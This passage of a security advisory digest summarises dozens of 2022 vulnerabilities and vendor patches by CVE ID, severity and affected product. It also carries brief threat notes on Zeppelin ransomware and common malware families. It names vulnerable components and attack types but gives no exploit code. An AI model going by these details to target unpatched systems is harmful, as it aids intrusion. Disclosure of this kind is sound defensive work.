It has been discovered that the IBM Security Verify Governance Identity Manager virtual
appliance component performs an operation at a privilege level that is higher than the
minimum level required, which creates new weaknesses or amplifies the consequences of other
weaknesses. The affected version is IBM Security Verify Governance Identity Manager 10.0.
CVE ID: CVE-2022-22455 (Critical)
It has been discovered that Zoom On-Premise Meeting Connector Zone Controller (ZC) fails to
properly parse STUN error codes, which can result in memory corruption and can allow a
malicious actor to crash the application. The affected versions are Zoom On-Premise Meeting
Connector Zone Controller (ZC) versions prior to 4.8.20220419.112.
CVE ID: CVE-2022-28750 (Critical)
Buffer Overflow vulnerability has been discovered in D-Link Go-RT-AC750
GORTAC750_revA_v101b03 & GO-RT-AC750_revB_FWv200b02 via authenticationcgi_main.
CVE ID: CVE-2022-36525 (Critical)
Command Injection vulnerability has been discovered in D-Link Go-RT-AC750
GORTAC750_revA_v101b03 & GO-RT-AC750_revB_FWv200b02 via /htdocs/upnpinc/gena.php.
CVE ID: CVE-2022-36523 (Critical)
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
CVE ID: CVE-2022-2625 (High), CVE-2022-33741 (High), CVE-2022-26365 (High),
CVE-2022-33740 (High), CVE-2022-37434 (Critical)
Debian has released
security updates to resolve several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take
control of an affected system. CVE ID: CVE-2022-32792,
CVE-2022-32816, CVE-2022-24805, CVE-2022-24806, CVE-2022-24807,
CVE-2022-24808, CVE-2022-24809, CVE-2022-24810, CVE-2022-29536,
CVE-2022-2852, CVE-2022-2853, CVE-2022-2854, CVE-2022-2855,
CVE-2022-2856, CVE-2022-2857, CVE-2022-2858, CVE-2022-2859,
CVE-2022-2860, CVE-2022-2861.
Cisco has released
security updates to resolve several vulnerabilities in multiple
Cisco products. An attacker can exploit these vulnerabilities to
take control of an affected system. CVE ID: CVE-2022-20871
(High), CVE-2022-20829 (Medium)
WordPress has released
security updates to address vulnerabilities in Migration, Backup,
Staging – WPvivid plugin for WordPress, Download Manager plugin
for WordPress, and All-in-One Video Gallery plugin for WordPress.
CVE ID: CVE-2022-2442 (High), CVE-2022-2436 (High),
CVE-2022-2633 (High)
Apple has released
security updates to resolve multiple vulnerabilities in its
products. An attacker can exploit these vulnerabilities to take
control of an affected system. CVE ID: CVE-2022-32894,
CVE-2022-32893
Google has released
Chrome Beta 105 (105.0.5195.37) for iOS, Chrome 104
(104.0.5112.97) for Android, Chrome Beta 105 (105.0.5195.35) for
Android, and Beta channel 105.0.5195.37 for Windows, Mac and
Linux.
Zoom has released
security updates to address a privilege escalation vulnerability
in Auto Updater for Zoom Client for Meetings for macOS. The
affected products are Zoom Client for Meetings for macOS
(Standard and for IT Admin) starting version 5.7.3 and before
version 5.11.6. CVE ID: CVE-2022-28757 (High)
Multiple vulnerabilities
have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected
system. The updates are available.
Microsoft has released
Microsoft Edge Mobile Stable Channel (Version 104.0.1293.60).
This update contains a fix for CVE-2022-2856, which has an
exploit in the wild.
A SQL injection
vulnerability has been discovered in Clinic's Patient Management
System. The affected version is Clinic's Patient Management
System v1.0. CVE ID: CVE-2022-36242 (Critical)
A code injection
vulnerability has been discovered in Esri Portal for ArcGIS which
can potentially cause arbitrary code execution in a victims
browser. The affected versions are Esri Portal for ArcGIS
versions 10.8.1 and below. CVE ID: CVE-2022-38193
(Critical)
A SQL injection
vulnerability has been discovered in Mingsoft MCMS. The affected
version is Mingsoft MCMS 5.2.8. CVE ID: CVE-2022-36599
(Critical), CVE-2022-36272 (Critical)
A buffer overflow
vulnerability has been discovered in the FTcpListener thread of
The Isle Evrima (the dedicated server on Windows and Linux),
which allows a remote attacker to crash any server with an
accessible RCON port, or possibly execute arbitrary code. The
affected versions are The Isle Evrima 0.9.88.07 before
2022-08-12. CVE ID: CVE-2022-38221 (Critical)
It has been discovered
that totd uses a fixed UDP source port in upstream queries sent
to DNS resolvers. This allows DNS cache poisoning because there
is not enough entropy to prevent traffic injection attacks. The
affected version is totd 1.5.3. CVE ID: CVE-2022-34294
(Critical)
It has been discovered
that Airspan AirVelocity 1500 web management UI displays SNMP
credentials in plaintext and stores SNMPv3 credentials unhashed
on the filesystem, enabling anyone with web access to use these
credentials to manipulate the eNodeB over SNMP. The affected
versions are Airspan AirVelocity 1500 web management UI older
than 15.18.00.2511. CVE ID: CVE-2022-36308
(Critical)
It has been discovered
that multiple CODESYS vulnerabilities affect several WAGO
products. The mitigations are available. CVE ID: CVE-2019-9013
(High), CVE-2019-9011, CVE-2020-12067, CVE-2020-12069,
CVE-2021-33485 (Critical), CVE-2020-6081 (High), CVE-2021-36763
(High), CVE-2021-36765 (High), CVE-2021-29241 (High),
CVE-2021-29242 (High)
An authorization bypass vulnerability through User-Controlled Key has been discovered in the
GitHub repository emicklei/go-restful. The affected versions are GitHub repository
emicklei/go-restful prior to v3.8.0.
CVE ID: CVE-2022-1996 (Critical)
Multiple vulnerabilities
such as out-of-bounds write, and heap-based buffer overflow have
been discovered in HDF5 file format, which allows an attacker to
execute remote code on a targeted device. CVE ID: CVE-2022-25972,
CVE-2022-25942, CVE-2022-26061
Multiple vulnerabilities
have been discovered in WWBN AVideo Web App, which can lead to
command injection or authentication bypass. CVE ID:
CVE-2022-32777, CVE-2022-32778, CVE-2022-32761, CVE-2022-28710,
CVE-2022-30534, CVE-2022-33147, CVE-2022-33148, CVE-2022-33149,
CVE-2022-32572, CVE-2022-26842, CVE-2022-32770, CVE-2022-32771,
CVE-2022-32772, CVE-2022-30690, CVE-2022-28712, CVE-2022-29468,
CVE-2022-30605, CVE-2022-32282
WordPress has released a security update to address a vulnerability due to deserialization
of untrusted input via the $log_file value in Broken Link Checker plugin for WordPress. The
affected versions are Broken Link Checker versions up to, and including 1.11.16.
CVE ID: CVE-2022-2438 (High)
It has been discovered that cyber threat actors have been targeting unpatched Zimbra
Collaboration Suite (ZCS) instances in both government and private sector networks.
Organizations that detect potential compromises should apply the mitigations.
CVE ID: CVE-2022-27924 (High), CVE-2022-27925 (High), CVE-2022-37042 (High),
CVE-2022-30333 (High), CVE-2022-24682 (Medium)
An inadequate encryption strength vulnerability has been discovered in LS Electric's
Equipment- LS ELEC PLC and XG5000. Successful exploitation of this vulnerability can allow
to decrypt credentials and gain full access to the affected Programmable Logic Controller
(PLC).
CVE ID: CVE-2022-2758 (Medium)
Delta Electronics has released security updates to address an improper restriction of XML
external entity reference vulnerability in its Equipment- Delta Robot Automation Studio
(DRAS) that can cause read and exfiltrate sensitive information from the affected host
machine.
CVE ID: CVE-2022-2759 (Medium)
An unrestricted upload of a file with a dangerous type vulnerability has been discovered in
B&R Industrial Automation's Equipment- Automation Studio 4, which can cause a threat to the
integrity and confidentiality of data or cause a Denial of Service condition. The
mitigations are available.
CVE ID: CVE-2021-22289 (High)
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
A vulnerability has been discovered in taocms website settings that allows arbitrary php
code to be injected by modifying config.php. The affected version is taocms 3.0.2.
CVE ID: CVE-2022-36262 (Critical)
A vulnerability in VR Calendar WordPress plugin allows any user to execute arbitrary PHP
functions on the site. The affected versions are VR Calendar WordPress plugin through 2.2.2.
CVE ID: CVE-2022-2314 (Critical)
An authentication bypass vulnerability has been discovered in YugabyteDB 2.6.1 when using
LDAP-based authentication in YCQL with Microsofts Active Directory.
CVE ID: CVE-2022-37397 (Critical)
A stack overflow vulnerability has been discovered in /goform/setAutoPing of Tenda W6. An
attacker can use this vulnerability to execute arbitrary code execution. The affected
version is Tenda W6 V1.0.0.9(4122).
CVE ID: CVE-2022-35559 (Critical)
A vulnerability has been discovered in Red Hat Process Automation Manager that allows an
adversary to conduct a brute force attack against Administration Console as the application
does not limit the number of unsuccessful login attempts.
CVE ID: CVE-2022-2457 (Critical)
Softing has released security updates to address multiple vulnerabilities in its Equipment-
Secure Integration server that can cause a Denial of Service (DoS) condition.
CVE ID: CVE-2022-1069 (High), CVE-2022-2334 (High), CVE-2022-2336 (Critical),
CVE-2022-1373 (High), CVE-2022-2338 (Medium), CVE-2022-1748 (High), CVE-2022-2337 (High),
CVE-2022-2547 (High), CVE-2022-2335 (High)
Multiple vulnerabilities have been discovered in Emerson's Equipment- Proficy Machine
Edition. Successful exploitation of these vulnerabilities can allow execution of remote
hidden code on the connected Programmable Logic Controller (PLC) and malicious files to be
uploaded from the PLC to connected workstations. The mitigations are available.
CVE ID: CVE-2022-2793 (Medium), CVE-2022-2792 (Medium), CVE-2022-2791 (Medium),
CVE-2022-2790 (Medium), CVE-2022-2789 (Medium), CVE-2022-2788 (Critical)
Multiple vulnerabilities have been discovered in Sequi's Equipment- Sequi PortBloque S,
which can result in unauthorized changes to device configuration, to include adding new
users or changing existing passwords for persistent access to the device.
CVE ID: CVE-2022-2662 (Critical), CVE-2022-2661 (Critical)
Google has released Dev channel 106.0.5239.0 (Platform version: 15047.0.0/15048.0.0) for
most ChromeOS devices,Chrome Stable 104 (104.0.5112.99) for iOS and Stable channel
104.0.5112.101 for Mac & Linux & 104.0.5112.102/101 for Windows to resolve multiple
vulnerabilities. An exploit for insufficient validation of untrusted input in intents
vulnerability (CVE-2022-2856) exists in the wild.
CVE ID: CVE-2022-2852 (Critical), CVE-2022-2854 (High), CVE-2022-2855 (High),
CVE-2022-2857 (High), CVE-2022-2858 (High), CVE-2022-2853 (High), CVE-2022-2856 (High),
CVE-2022-2859 (Medium), CVE-2022-2860 (Medium), CVE-2022-2861 (Medium)
Red Hat has released
security updates to address multiple vulnerabilities in Red Hat
OpenShift sandboxed containers. The affected product is Red Hat
OpenShift Container Platform 4.11 for RHEL 8 x86_64. CVE
ID: CVE-2021-40528 (Medium), CVE-2022-1621 (High), CVE-2022-1629
(High), CVE-2022-22576 (High), CVE-2022-25313 (Medium),
CVE-2022-25314 (High), CVE-2022-27774 (Medium), CVE-2022-27776
(Medium), CVE-2022-27782 (High), CVE-2022-29824 (Medium)
Microsoft has released security updates to address an elevation of privilege vulnerability
in Windows Defender Credential Guard affecting multiple products. Successful exploitation of
this vulnerability can allow an attacker to gain SYSTEM privileges.
CVE ID: CVE-2022-34711 (High)
Microsoft has released security updates to address a security feature bypass vulnerability
in Windows Defender Credential Guard affecting multiple products. Successful exploitation of
this vulnerability can allow an attacker to bypass Kerberos protection used by Defender
Credential Guard.
CVE ID: CVE-2022-35822 (High)
Ubuntu has released
security updates to resolve multiple vulnerabilities in WebKitGTK
Web and JavaScript engines that can cause Cross Site Scripting
(XSS) attacks, Denial of Service (DoS) attacks, and arbitrary code
execution. The affected products are Ubuntu 22.04 LTS & Ubuntu
20.04 LTS. CVE ID: CVE-2022-2294 (High),
CVE-2022-32792, CVE-2022-32816
Out of bounds write
vulnerability has been discovered in Chrome OS Audio Server in
Google Chrome for Chrome OS. This vulnerability allows a remote
attacker to potentially exploit heap corruption via crafted audio
metadata. The affected version are Google Chrome for Chrome OS
prior to 102.0.5005.125. CVE ID: CVE-2022-2587
(Critical)
It has been discovered
that due to insecure session management, SAP Enable Now allows an
unauthenticated attacker to gain access to user's account. On
successful exploitation, an attacker can view or modify user data
causing limited impact on confidentiality and integrity of the
application. CVE ID: CVE-2022-35293 (Critical)
An authentication-bypass
vulnerability has been discovered in MSNSwitch MNT.2408 of Mega
System Technologies Inc. This vulnerability allows
unauthenticated attackers to arbitrarily configure settings
within the application, leading to remote code execution. CVE ID: CVE-2022-32429 (Critical)
Multiple vulnerabilities
have been discovered in IBM products. An attacker can exploit
these vulnerabilities to take control of an affected system. The
updates are available.
TRUMPF has released
security updates to address multiple vulnerabilities in OPC UA
SDK that affects several TRUMPF products. CVE ID: CVE-2022-29864
(High), CVE-2022-29862 (High)
Privilege Escalation
vulnerability has been discovered in Auto Updater for Zoom Client
for Meetings for macOS. The affected products are Zoom Client for
Meetings for macOS (Standard and for IT Admin) starting with
version 5.7.3 and before 5.11.5. CVE ID: CVE-2022-28756
(High)
Multiple vulnerabilities have been discovered in several NetApp products.An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
CVE ID:
CVE-2022-35912(Critical),CVE-2022-33879(Low),CVE-2022-32532(Critical),CVE-2022-29582(High),CVE-2022-26477(High),CVE-2021-23055(Medium)
It has been discovered
that IBM Robotic Process Automation does not require users to
have strong passwords by default, which makes it easier for
attackers to compromise user accounts. The affected versions are
IBM Robotic Process Automation 21.0.0, 21.0.1, and 21.0.2. CVE ID: CVE-2022-35280 (Critical)
It has been discovered
that ts-deepmerge package is vulnerable to Prototype Pollution
due to missing sanitization of the merge function. The affected
versions are ts-deepmerge package before 2.0.2. CVE
ID: CVE-2022-25907 (Critical)
An insufficient verification of data authenticity OT: ICEFALL vulnerability has been
discovered in Emerson's Equipment- ROC800, ROC800L and DL8000 that can cause file
manipulation.
CVE ID: CVE-2022-30264 (Medium)
Multiple vulnerabilities have been discovered in Baxter's Equipment- Sigma Spectrum Infusion
Pumps that can result in access to sensitive data, alteration of system configuration, and
impact on system availability.
CVE ID: CVE-2020-12039 (Medium), CVE-2020-12040 (High), CVE-2020-12045 (High),
CVE-2020-12041 (High), CVE-2020-12047 (High), CVE-2020-12043 (High)
Zeppelin ransomware, a derivative of the Delphi-based Vega malware family and functions as a
Ransomware as a Service (RaaS) is targeting critical infrastructure organisations. Adversary
gain initial access to victim networks via RDP exploitation, exploiting SonicWall firewall
vulnerabilities and phishing campaigns.
A security feature bypass vulnerability has been discovered in signed third party UEFI
bootloaders that allows bypass of the UEFI Secure Boot feature. An attacker who successfully
exploits this vulnerability can bypass the UEFI Secure Boot feature and execute unsigned
code during the boot process.
CVE ID: CVE-2022-34301, CVE-2022-34302, CVE-2022-34303
A memory corruption vulnerability has been discovered in the httpd unescape functionality of
DD-WRT Revision 32270 - Revision 48599.
CVE ID: CVE-2022-27631 (Critical)
A memory corruption vulnerability has been discovered in the httpd unescape functionality of
Asuswrt and Asuswrt-Merlin. A specially-crafted HTTP request can lead to memory corruption.
The affected versions are Asuswrt prior to 3.0.0.4.386_48706 and Asuswrt-Merlin New Gen
prior to 386.7.
CVE ID: CVE-2022-26376 (Critical)
A heap-based buffer over-read vulnerability or buffer overflow vulnerability has been
discovered in zlib through 1.2.12
CVE ID: CVE-2022-37434 (Critical)
A PAN-OS URL filtering policy misconfiguration could allow a network-based attacker to
conduct reflected and amplified TCP denial-of-service (RDoS) attacks.
CVE ID: CVE-2022-0028 (High)
SonicWall has released security updates to address multiple Linux Kernel vulnerabilities
that affect SonicWall SMA1000 Platform. The affected products are SonicWall SMA1000
12.4.2-02044 and earlier versions.
CVE ID: CVE-2021-33909 (High), CVE-2022-0847 (High)
Cisco has released security updates to resolve several vulnerabilities in multiple Cisco
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
CVE ID: CVE-2022-20715 (High), CVE-2022-20866 (High), CVE-2022-20713 (Medium),
CVE-2022-20829 (Medium), CVE-2021-1585 (Medium)
Dell has released security updates to address multiple vulnerabilities in its products. An
attacker can exploit these vulnerabilities to take control of an affected system.
Cross site scripting vulnerability has been discovered in jQuery UI Checkboxradio, a
third-party library used by Drupal. jQuery UI has released security update to address this
vulnerability.
CVE ID: CVE-2022-31160
Google has released Chrome Beta 105 (105.0.5195.28) for iOS, LTS channel 96.0.4664.218
(Platform Version: 14268.99.0) for most ChromeOS devices, LTC- 102.0.5005.170 (Platform
Version: 14695.115.0) for most ChromeOS devices, Beta channel 105.0.5195.28 for Windows, Mac
and Linux, and Chrome Beta 105 (105.0.5195.26) for Android.
CVE ID: CVE-2022-2477 (High), CVE-2022-2481 (High), CVE-2022-2480 (High),
CVE-2022-2479 (High)
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
SQL injection vulnerability has been discovered in SourceCodester Interview Management
System. Affected version is 1.0.
CVE ID: CVE-2022-2679 (Critical)
It has been discovered that Renato employs weak password complexity requirements that allows
attackers to crack user passwords via brute-force attacks. The affected version is Renato
v0.17.0.
CVE ID: CVE-2022-35143 (Critical)
It has been discovered that Totolink A3600R_Firmware V4.1.2cu.5182_B20201102 contains a hard
code password for root in /etc/shadow.sample.
CVE ID: CVE-2022-34993 (Critical)
It has been discovered that Crow has a heap-based buffer overflow vulnerability via the
function qs_parse in query_string.h. Successful exploitation of this vulnerability can allow
attackers to remotely execute arbitrary code in the context of the vulnerable service.
CVE ID: CVE-2022-34970 (Critical)
It has been discovered that Nextcloud Mail has a vulnerability that can lead to Server-Side
Request Forgery (SSRF). The updates are available.
CVE ID: CVE-2022-31132 (Critical)
Authentication Bypass vulnerability has been discovered in GitHub repository
bookwyrm-social/bookwyrm. Version prior to 0.4.5 are affected.
CVE ID: CVE-2022-2651 (Critical)
It has been discovered that GVRET Stable Release contain a buffer overflow vulnerability via
the handleConfigCmd function at SerialConsole.cpp.
CVE ID: CVE-2022-35161 (Critical)
Heap-based buffer overflow vulnerability has been discovered in sqbaselib.cpp in SQUIRREL
due to lack of a certain sq_reservestack call.
CVE ID: CVE-2022-30292 (Critical)
A vulnerability has been discovered in Vinchin Backup and Recovery. The server uses a
hard-coded password for the administrator user. Successful exploitation can allow an
attacker to bypass authentication on the system.
CVE ID: CVE-2022-35866 (Critical)
Microsoft has released security updates to address a remote code execution vulnerability in
Microsoft Windows Support Diagnostic Tool (MSDT).
CVE ID: CVE-2022-34713 (High)
Microsoft has released security updates to address a Remote Code Execution (RCE)
vulnerability in Windows Network File System.
CVE ID: CVE-2022-34715 (Critical)
Microsoft has released security updates to address a Remote Code Execution (RCE)
vulnerability in Windows Point-to-Point Protocol (PPP). An unauthenticated attacker can send
a specially crafted connection request to a RAS server, which can lead to remote code
execution on the RAS server machine.
CVE ID: CVE-2022-30133 (Critical)
Ubuntu has released security updates to resolve a vulnerability in libcdio, which can
result in a heap buffer overflow or in a NULL pointer dereference.
If a user or automated system were tricked into opening a
specially crafted file, an attacker can use this vulnerability to
cause a Denial of Service. The affected products are Ubuntu 16.04
ESM, and Ubuntu 14.04 ESM. CVE ID: CVE-2017-18198
(High), CVE-2017-18199 (Medium)
SAP has released
security updates to address several vulnerabilities affecting
multiple products. An attacker can exploit these vulnerabilities
to take control of an affected system.
Multiple vulnerabilities
have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected
system. The updates are available.
AUMA Riester has
released security updates for SIMA2 Master Station that contains
an outdated version of ntpd, a reference implementation of the
Network Time Protocol (NTP), which is affected by several
vulnerabilities. CVE ID: CVE-2015-7853 (Critical),
CVE-2015-7705 (Critical), CVE-2018-12327 (Critical),
CVE-2015-7871 (Critical), CVE-2018-7183 (Critical)
Debian has released
security update to resolve multiple vulnerabilities in Gstreamer
plugins to demux Mastroska and AVI files which can result in
Denial of Service or the execution of arbitrary code. CVE
ID: CVE-2022-1920, CVE-2022-1921, CVE-2022-1922, CVE-2022-1923,
CVE-2022-1924, CVE-2022-1925, CVE-2022-2122
Ubuntu has released
security updates to resolve multiple vulnerabilities in Linux
kernel. The affected products are Ubuntu 16.04 ESM, and Ubuntu
14.04 ESM. CVE ID: CVE-2022-2588 (Medium),
CVE-2022-2586 (Medium)
Microsoft has released
updates to address multiple vulnerabilities in Microsoft
software. An attacker can exploit these vulnerabilities to take
control of an affected system.
VMware has released
security updates to address multiple vulnerabilities in vRealize
Operations, and VMware Workstation. A remote attacker can exploit
these vulnerabilities to take control of an affected system. CVE ID: CVE-2022-22983 (Medium), CVE-2022-31672 (High),
CVE-2022-31673 (Medium), CVE-2022-31674 (Medium), CVE-2022-31675
(Medium)
Dell has released
security updates to address multiple vulnerabilities in its
products. An attacker can exploit these vulnerabilities to take
control of an affected system.
Intel has released
security updates to address multiple vulnerabilities in its
products. An attacker can exploit these vulnerabilities to take
control of an affected system.
Citrix has released
security update to address a vulnerability in Citrix Hypervisor
7.1 LTSR CU2 that can allow privileged code in a PV guest VM to
fail to perform management operations. CVE ID: CVE-2022-33745
(High)
It has been discovered
that Execution unit scheduler contention can lead to a side
channel vulnerability in AMD CPU microarchitectures codenamed
“Zen 1”, “Zen 2” and “Zen 3” that use simultaneous multithreading
(SMT). By measuring the contention level on scheduler queues an
attacker can leak sensitive information. CVE ID: CVE-2021-46778
Adobe has released security updates to address multiple vulnerabilities in its products. An
attacker can exploit some of these vulnerabilities to take control of an affected system.
CVE ID:
CVE-2022-34253(Critical), CVE-2022-34255, CVE-2022-34256, CVE-2022-34254, CVE-2022-34257, CVE-2022-34258, CVE-2022-34259, CVE-2022-34260,
CVE-2022-34261, CVE-2022-34262, CVE-2022-34263, CVE-2022-34264, CVE-2022-35673,
CVE-2022-35674, CVE-2022-35675,
CVE-2022-35676,CVE-2022-35677, CVE-2022-34235, CVE-2022-35665, CVE-2022-35666, CVE-2022-35668, CVE-2022-35670, CVE-2022-35667, CVE-2022-35671, CVE-2022-35678
Multiple memory
corruption vulnerabilities have been discovered in the httpd
unescape functionality of FreshTomato. The affected version is
FreshTomato 2022.1. CVE ID: CVE-2022-28665
(Critical), CVE-2022-28664 (Critical)
An insufficient
verification of data authenticity, OT:ICEFALL vulnerability has
been discovered in Emerson's Equipment- ControlWave that can
cause file manipulation, Remote Code Execution (RCE), or Denial
of Service (DoS). CVE ID: CVE-2022-30262 (Critical)
Multiple OT: ICEFALL
vulnerabilities have been discovered in Emerson's Equipment-
OpenBSI that can cause Remote Code Execution (RCE), change
controller configuration, or cause a Denial of Service (DoS)
condition. CVE ID: CVE-2022-29959 (Critical),
CVE-2022-29960 (High)
Multiple vulnerabilities
have been discovered in Zoom, affecting its several platforms. An
attacker can exploit these vulnerabilities to take control of an
affected system. The updates are available. CVE ID:
CVE-2022-34759, CVE-2022-34760, CVE-2022-34761, CVE-2022-34762,
CVE-2022-34763, CVE-2022-34764, CVE-2022-34765, CVE-2020-35198,
CVE-2020-28895, CVE-2021-22156, CVE-2021-22789, CVE-2021-22790,
CVE-2021-22791, CVE-2021-22792, CVE-2021-22778, CVE-2021-22779,
CVE-2021-22780, CVE-2021-22781, CVE-2021-22782,
CVE-2020-12525, CVE-2019-6843, CVE-2019-6844, CVE-2019-6846,
CVE-2019-6847, CVE-2019-6841, CVE-2019-6842, CVE-2018-7240,
CVE-2018-7241, CVE-2018-7242, CVE-2021-44228, CVE-2021-45046,
CVE-2021-45105, CVE-2021-4104,
CVE-2021-44832, CVE-2021-22786, CVE-2022-37302, CVE-2022-37301, CVE-2022-37300
Schneider Electric has
released security updates to resolve multiple vulnerabilities in
its products. An attacker can exploit these vulnerabilities to
take control of an affected system. CVE ID: CVE-2022-37300
(Critical), CVE-2022-37301 (High), CVE-2022-37302 (Medium),
CVE-2021-22786 (High)
A stack-based buffer overflow vulnerability has been discovered in Realtek eCos routers that
allows Remotely Execute Code (RCE) without authentication via a crafted SIP packet that
contains malicious SDP data. The affected versions are Realtek eCos RSDK 1.5.7p1 and MSDK
4.9.4p1.
CVE ID: CVE-2022-27255 (Critical)
NetApp has released
security updates for StorageGRID deployed with a Linux kernel to
address a vulnerability which can allow a remote unauthenticated
attacker to view limited metrics information and modify alert
email recipients and content. CVE ID: CVE-2022-23238
(High)
A vulnerability has been
discovered in SourceCodester Online Admission System that affects
an unknown code of the component POST Parameter Handler. The
manipulation of the argument shift leads to sql injection. CVE ID: CVE-2022-2643 (Critical)
Debian has released
security updates to resolve several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take
control of an affected system.
A vulnerability has been
discovered in Twitter that allowed someone to enter a phone
number or email address into the log-in flow in the attempt to
learn if that information was tied to an existing Twitter
account, and if so, which specific account.
It has been discovered
that the Simple Membership WordPress plugin allows users to
change their membership at the registration stage due to
insufficient checking of a user supplied parameter. The affected
versions are Simple Membership WordPress plugin before 4.1.3. CVE ID: CVE-2022-2317 (Critical)
F5 Networks has released
security updates to address a vulnerability in BIG-IP Advanced
WAF and BIG-IP ASM systems that incorrectly handled certain
requests.
HarmonyOS has released
security bulletin to address multiple vulnerabilities affecting
several Huawei phones and tablets that run HarmonyOS. Security
patch levels of 2022-08-01 or later address all of these issues.
It has been discovered
that DedeCMS contains a Remote Code Execution (RCE) vulnerability
via the component mytag_ main.php. The affected version is
DedeCMS v5.7.95. CVE ID: CVE-2022-34531 (Critical)
It has been discovered
that Hiby R3 PRO firmware contains a file upload vulnerability
via the file upload feature. The affected versions are Hiby R3
PRO firmware v1.5 to v1.7. CVE ID: CVE-2022-34496
(Critical)
An improper access
control vulnerability has been discovered in SourceCodester
Garage Management System. The affected version is SourceCodester
Garage Management System 1.0. CVE ID: CVE-2022-2578
(Critical)
Google Play has released
security update to address an Incorrect signature trust
vulnerability in Google Play services SDK
play-services-basement. CVE ID: CVE-2022-1799
(Critical)
A URL restriction bypass
vulnerability has been discovered in the GitHub
repository plantuml/plantuml that can cause Server Side Request
Forgery (SSRF). The affected versions are GitHub
repository plantuml/plantuml prior to V1.2022.5. CVE
ID: CVE-2022-1379 (Critical)
Microsoft has released
Microsoft Edge Stable Channel (Version 104.0.1293.47) to resolve
multiple vulnerabilities. CVE ID: CVE-2022-33636
(High), CVE-2022-33649 (Critical), CVE-2022-35796 (High)
It has been
discovered that the Simple Membership WordPress plugin allows
users to change their membership at the registration stage due to
insufficient checking of a user supplied parameter. The affected
versions are Simple Membership WordPress plugin before 4.1.3. CVE ID: CVE-2022-2317 (Critical)
It has been discovered
that DedeCMS contains a Remote Code Execution (RCE) vulnerability
via the component mytag_ main.php. The affected version is
DedeCMS v5.7.95. CVE ID: CVE-2022-34531 (Critical)
It has been discovered
that Hiby R3 PRO firmware contains a file upload vulnerability
via the file upload feature. The affected versions are Hiby R3
PRO firmware v1.5 to v1.7. CVE ID: CVE-2022-34496
(Critical)
An improper access
control vulnerability has been discovered in SourceCodester
Garage Management System. The affected version is SourceCodester
Garage Management System 1.0. CVE ID: CVE-2022-2578
(Critical)
Google Play has released
security update to address an Incorrect signature trust
vulnerability in Google Play services SDK
play-services-basement. CVE ID: CVE-2022-1799
(Critical)
A URL restriction bypass
vulnerability has been discovered in the GitHub
repository plantuml/plantuml that can cause Server Side Request
Forgery (SSRF). The affected versions are GitHub
repository plantuml/plantuml prior to V1.2022.5. CVE
ID: CVE-2022-1379 (Critical)
Microsoft has released
Microsoft Edge Stable Channel (Version 104.0.1293.47) to resolve
multiple vulnerabilities. CVE ID: CVE-2022-33636
(High), CVE-2022-33649 (Critical), CVE-2022-35796 (High)
It has been discovered that the KUKA SystemSoftware V/KSS robot control systems of KUKA KR
C4 and KR C5 product lines are affected by an access control vulnerability in the WorkVisual
Service Host interface. The mitigations are available.
CVE ID: CVE-2022-2242 (Critical)
It has been discovered that Apache Hadoop's FileUtil.unTar(File, File) API does not escape
the input file name before being passed to the shell. This vulnerability allows an attacker
to inject arbitrary commands.
CVE ID: CVE-2022-25168 (Critical)
The top malware strains
observed in 2021 are Agent Tesla, AZORult, Formbook, Ursnif,
LokiBot, MOUSEISLAND, NanoCore, Qakbot, Remcos, TrickBot and
GootLoader. Updates made by malware developers, and reuse of code
from these malware strains, contribute to the malware’s longevity
and evolution into multiple variations. Critical infrastructure
organisations are urged to prepare for and mitigate potential
cyber threats immediately by updating software, enforcing
Multiple Factor Authentication (MFA), securing and monitoring RDP
and other potentially risky services, making offline backups of
data and providing end-user awareness and training.
A path traversal
vulnerability via crafted HTTP request has been discovered in
muhttpd version 1.1.5 and earlier. Security update is available. CVE ID: CVE-2022-31793
Ubuntu has released security updates
to address several vulnerabilities in multiple products. An
attacker can exploit these vulnerabilities to take control of an
affected system.
It has been discovered
that OMICARD EDMs API function has insufficient validation
vulnerability for user input that allows SQL injection
vulnerability to access, modify, delete database or disrupt
service. CVE ID: CVE-2022-32964 (Critical)
It has been discovered
that Pligg CMS contain a time-based SQL injection vulnerability
via the page_size parameter at load_data_for_groups.php. The
affected version is Pligg CMS v2.0.2. CVE ID: CVE-2022-34956
(Critical)
An out of bounds write vulnerability
due to uninitialized data has been discovered in httpclient that
can lead to remote escalation of privilege. The update is
available. CVE ID: CVE-2022-26437 (Critical)
An XML External Entity
Injection (XXE) vulnerability has been discovered in IBM
DataPower Gateway. The affected versions are IBM DataPower
Gateway 10.0.2.0 through 10.0.4.0, 10.0.1.0 through 10.0.1.8,
10.5.0.0, and 2018.4.1.0 through 2018.4.1.21. CVE
ID: CVE-2022-31775 (Critical)
It has been discovered that WMAgent v1.3.3rc2 and 1.3.3rc1, reqmgr 2 1.4.1rc5 and 1.4.0rc2,
reqmon 1.4.1rc5, and global-workqueue 1.4.1rc5 allows attackers to execute arbitrary code
via a crafted dbs-client package. CVE ID: CVE-2022-34558 (Critical)
A Remote Code Execution(RCE) vulnerability via a crafted packet has been discovered in
TP-LINK TL-R473G 2.0.1 Build 220529 Rel.65574n. CVE ID: CVE-2022-34555 (Critical)
A Server Side Template Injection (SSTI) vulnerability has been discovered in ejs (aka
Embedded JavaScript templates) package for Node.js. CVE ID: CVE-2022-29078 (Critical)
An execution with unnecessary privileges vulnerability has been discovered in Digi
International's Equipment- ConnectPort X2D Gateway that may result in malicious code
execution. CVE ID: CVE-2022-2634
(Critical)
Huawei has released a security update to address an input verification vulnerability in
Huawei CV81-WDM FW products. Successful exploitation of this vulnerability can lead to DoS
attacks.
CVE ID: CVE-2022-37395 (High)
Dell has released security updates to address multiple vulnerabilities in Dell PowerScale
OneFS that can be exploited by malicious users to compromise the affected system.
CVE ID: CVE-2022-34369 (High), CVE-2022-34371 (High), CVE-2022-34378
(Medium)
Google has released Beta channel 105.0.5195.19 (Platform version: 14989.26.0) for most
ChromeOS devices, Chrome 105 (105.0.5195.19) Beta channel for Windows, Linux, and Mac,
Stable channel 104.0.5112.83 (Platform version: 14909.100.0) for most ChromeOS devices,
